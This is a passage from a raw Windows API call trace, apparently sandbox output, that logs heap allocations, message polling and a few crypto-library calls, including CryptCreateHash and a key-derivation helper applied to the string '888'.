hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0211.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0211.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0211.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0211.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0211.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0211.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0211.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0211.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0211.942] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0211.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0211.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0211.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0211.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0211.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0211.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0211.942] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0211.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0211.942] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0211.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0211.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0211.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0211.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0211.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0211.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0211.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0211.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0211.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0211.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0211.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0211.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0211.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0211.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0211.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0211.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0211.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0211.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0211.943] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0211.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0211.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0211.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0211.944] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0211.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0211.944] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.944] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.944] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0211.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0211.944] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0211.944] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0211.944] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.944] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0211.944] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0211.945] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0211.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0211.945] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0211.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0211.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0211.945] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0211.945] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0211.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0211.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0211.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0211.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0211.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0211.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0211.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0211.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0211.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0211.946] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0211.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0211.946] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0211.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0211.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0211.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0211.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0211.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0211.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0211.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0211.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0211.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0211.946] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0211.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0211.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0211.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0211.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0211.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0211.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0211.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0211.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0211.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0211.947] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0211.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0211.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0211.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0211.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0211.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0211.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0211.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0211.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0211.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0211.947] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0211.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0211.947] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0211.947] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0211.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0211.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0211.948] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0211.948] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0211.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0211.948] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.948] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0211.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0211.948] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0211.948] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0211.948] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.948] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0211.948] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0211.948] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0211.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0211.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0211.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0211.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0211.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0211.949] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0211.949] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0211.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0211.949] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0211.949] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0211.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0211.949] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0211.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0211.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0211.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0211.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0211.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0211.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e509f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0211.950] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0211.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0211.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0211.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0211.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0211.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0211.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0211.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0211.950] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0211.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0211.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0211.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0211.950] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.950] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0211.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.951] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0211.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0211.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0211.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0211.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0211.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0211.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0211.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0211.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0211.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0211.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0211.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0211.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0211.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ec8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0211.951] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0211.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0211.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0211.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0211.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0211.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0211.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0211.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0211.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0211.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0211.952] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.952] RtlAllocateHeap (HeapHandle=0x970000, 